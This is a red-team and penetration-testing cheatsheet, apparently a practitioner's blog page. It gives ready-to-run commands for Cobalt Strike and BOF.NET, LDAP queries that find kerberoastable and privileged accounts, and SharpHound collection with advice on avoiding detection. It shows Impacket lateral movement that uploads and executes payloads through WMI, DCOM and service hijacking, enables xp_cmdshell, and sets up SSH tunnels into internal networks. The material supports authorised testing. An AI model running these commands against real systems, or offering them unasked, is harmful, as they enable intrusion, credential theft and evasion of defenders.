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Red Teaming and Penetration Testing Checklist, Cheatsheet, Clickscript

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Red Teaming and Penetration Testing Checklist, Cheatsheet, Clickscript

Not a definitive list, cheatsheet, or opsec safe by any means, just things of note....

Several enumeration techniques are picked up by defenses (including sharphound collectors), especially LDAP queries with asteriks like attribute=*. Iterative lookups are usually better, if you know what I mean.

C2 Redirectors

Must-Have BOFs:

C2 Command Cheatsheets (Cobaltstrike + Sliver):

Roxana Kovaci's Obfucated BINs:

  • Obfucated BINs using Azure Pipelines
    • wget && unzip -o && cat correlation.txt

Execute-Assembly through BOF:

All assemblies should be run through BOF.NET.

In Beacon terminal:

  1. bofnet_init
  2. bofent_load /Path/To/Assembly.exe
  3. bofnet_executeassembly ASSEMBLYNAME -arg1 VALUE -arg2 VALUE

External Recon Checklist (Essentials)

  1. OSINT (Passive)
    • Whois company, what do they do or specialize in
    • Find out what the company atmosphere is like (use company review sites like Glassdoor)
    • ASN Lookups
    • DNS Recon (amass, subfinder,,certspotter DNS Zone transfers, etc), including MX/SPF etc
    • Shodan
    • Company email format (first.last, flast, etc -> find on
    • Code repository recon (github, gitlab, bitbucket, etc) using truffleHog, git-secrets, etc
    • Perform AWS bucket and/or Azure blob enumeration using tools such as MicroBurst and inSp3ctor.
    • Harvest employee names (use theHarvester and/or Linky with keyword searches) and curate list with company email format
      • (Used for phishing and/or password spraying)
  2. (Active)
    • Nmap IPs/Domains for list of systems online and any open ports
    • Take note of any management ports externally accessible
    • Identify any web apps (Eyewitness/Aquatone)
      • (Especially employee login portals to perform a password spray)
    • Inspect web apps for comments or files hosted in amazon, azure, etc.
    • Perform discovery of documents across live domains to extract MetaData from (PyMeta, PowerMeta, or FOCA)

Initial Access Recon

LDAP Queries with ldapsearch Cobalt Strike BOF

Get Domain Controllers

ldapsearch "(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))"

Get all Domain Admins

ldapsearch "(&(objectCategory=group)(name=Domain Admins))"

Get Password Policy

ldapsearch "(&(objectClass=msDS-PasswordSettings))"

Get specific User

ldapsearch "(&(objectCategory=person)(objectClass=user)(samaccountname=TARGETUSERNAME))"

Get specific Computer

ldapsearch "(&(objectCategory=Computer)(name=TARGETCOMPUTERNAME))"

Get all Groups

ldapsearch "(&(objectClass=group))"

Get all active (not disabled) Users

ldapsearch "(&(objectCategory=person)(objectClass=user)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))"

Get all active (not disabled) Computers

ldapsearch "(&(objectCategory=Computer)(!userAccountControl:1.2.840.113556.1.4.803:=2))"

Get (not disabled) accounts with SPN set for kerberoasting

ldapsearch "(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))"

Get (not disabled) accounts that do not require PREAUTH for asreproasting

ldapsearch "(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))"

Get Windows Servers

ldapsearch "(&(&(&(&(samAccountType=805306369)(!(primaryGroupId=516)))(objectCategory=computer)(operatingSystem=Windows Server*))))"

Get Users with passnotreq set

ldapsearch "(&(objectCategory=Person)(objectClass=User)(userAccountControl:1.2.840.113556.1.4.803:=32))"

All users with Password Never Expires set

ldapsearch "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))"


Use bofhound to generate bloodhound json data

First, run the above ldap queries (as necessary) and THEN the following ldapsearch's:

ldapsearch "(objectClass=domain)" DC=TARGET,DC=DOMAIN

ldapsearch "(schemaIDGUID=*)" name,schemaidguid -1 "" CN=Schema,CN=Configuration,DC=TARGET,DC=DOMAIN

ldapsearch (name=ms-mcs-admpwd) name,schemaidguid 1 "" CN=Schema,CN=Configuration,DC=TARGET,DC=DOMAIN

Run bofhound on the Cobalt Strike logs to create the json data.

Localhost Enumeration Examples with Seatbelt.exe

bofnet_load /path/to/Seatbelt.exe

bofnet_executeassembly Seatbelt -group=user

bofnet_executeassembly Seatbelt -group=system

bofnet_executeassembly Seatbelt -group=all -full

Sharphound Collection Methods for BloodHound

WARNING: Sharphound's queries are heavily signatured (even through proxy), run at your own risk. Try bofhound first.

bofnet_load /path/to/sharphound.exe

Run the following methods one at a time, mix up the order as desired:

bofnet_executeassembly Sharphound --CollectionMethods Group --Domain TARGETDOMAIN --Memcache --RandomFilenames

bofnet_executeassembly Sharphound --CollectionMethods Trusts --Domain TARGETDOMAIN --Memcache --RandomFilenames

bofnet_executeassembly Sharphound --CollectionMethods ACL --Domain TARGETDOMAIN --Memcache --RandomFilenames

bofnet_executeassembly Sharphound --CollectionMethods ObjectProps --Domain TARGETDOMAIN --Memcache --RandomFilenames

bofnet_executeassembly Sharphound --CollectionMethods Container --Domain TARGETDOMAIN --Memcache --RandomFilenames

bofnet_executeassembly Sharphound --CollectionMethods GPOLocalGroup --Domain TARGETDOMAIN --Memcache --RandomFilenames

If stuck and need to do Session and Localadmin collection, target specific systems of interest:

bofnet_executeassembly Sharphound --CollectionMethods Session,LocalAdmin --Domain TARGETDOMAIN --ComputerFile c:\path\to\target\systems.list --Jitter 20 --Throttle 2000 --Memcache --RandomFilenames

Windows Share Enumeration

Hunt for sensitive files, scripts, and plaintext credentials in accessible shares. Speed it up (can be loud) by using this amazing tool: Snaffler by l0ss.

Lateral Movement

Impacket over SOCKS through Proxychains

Start SOCKS5 in a Cobaltstrike Beacon, add it into your local /etc/proxychains4.conf file

Get a TGT (using hash or plaintext)

  • proxychains4 impacket-getTGT 'DOMAIN.COM/username:p@SsW0rD!'

Upload payload to targethost

  • proxychains4 impacket-smbclient 'DOMAIN.COM/username:' -no-pass -k

Execute payload. Example of a few notable methods:


  • proxychains4 impacket-wmiexec -nooutput -silentcommand -no-pass -k 'DOMAIN.COM/username:' 'C:\Windows\System32\cmd.exe /c C:\Path\To\Payload\maybe.exe'


  • proxychains4 impacket-dcomexec -object MMC20 -nooutput -silentcommand -no-pass -k 'DOMAIN.COM/username:' 'C:\Windows\System32\cmd.exe /c C:\Path\To\Payload\maybe.exe'


  • proxychains4 impacket-services 'DOMAIN.COM/username:' config -name ServiceName
    • Note down current config to change it back later
  • proxychains4 impacket-services 'DOMAIN.COM/username:' change -name ServiceName -path 'C:\windows\system32\cmd.exe /c C:\Path\To\Payload\maybe.exe'
  • proxychains4 impacket-services 'DOMAIN.COM/username:' start -name ServiceName
  • proxychains4 impacket-services 'DOMAIN.COM/username:' change -name ServiceName -path 'CHANGE BACK TO OLD CONFIG NOTED FROM EARLIER'


MoveKit and the required two assemblies: SharpRDP + SharpMove.

Use WMI or the Service binpath modifcation technique (SCShell by Mr-Un1k0d3r)


Check if xp_cmdshell is enabled

SELECT name, CONVERT(INT, ISNULL(value, value_in_use)) AS IsConfigured FROM sys.configurations WHERE name = 'xp_cmdshell';

Enable advanced options

EXEC('sp_configure ''show advanced options'', 1; reconfigure;');

Enable xp_cmdshell

EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;');


exec master.sys.xp_cmdshell 'whoami'


HVT ports for some quick wins on discovered subnets (mostly when on an internal network)

  • Java RMI: 1090,1098,1099,4444,11099,47001,47002,10999
  • WebLogic: 7001-7004, 8000-8003,9000-9003,9503,7070,7071
  • JDWP: 45000,45001
  • JMX: 8686,9012,50500
  • GlassFish: 4848
  • jBoss: 11111,4444,4445
  • Cisco Smart Install: 4786
  • HP Data Protector: 5555,5556
  • Apache Solr: 8983,8984


Backup with Rsync

Backup CobaltStrike Logs

rsync -avzh -e "ssh -i /path/to/" root@TEAMSERVER:/path/to/cobaltstrike/logs/ /path/to/local/destination/folder

OR using your default $HOME/.ssh/id_rsa

rsync -avzh -e "ssh" root@TEAMSERVER:/path/to/cobaltstrike/logs/ /path/to/local/destination/folder

SSH Tunnels

Access internal box:

Create a tunnel at externally accessible middlebox and back to Kali. Run from Kali (on someones internal network maybe):

ssh root@middlebox -R 2022:localhost:22

Run on middlebox:

ssh root@localhost -p 2022

Steps to produce a multihop one-liner to get into Kali:

run on Kali:

ssh root@middlebox -R 2022:localhost:22

Run on your local system at home sitting behind firewall:

ssh -t root@middlebox -L 2023:localhost:2022 ssh -p 2022 root@localhost

BONUS: Access CobaltStrike or any other service running on Kali by running this on your local machine:

ssh -L 50050:localhost:50050 -p2023 root@localhost


Red Teaming and Penetration Testing Checklist, Cheatsheet, Clickscript






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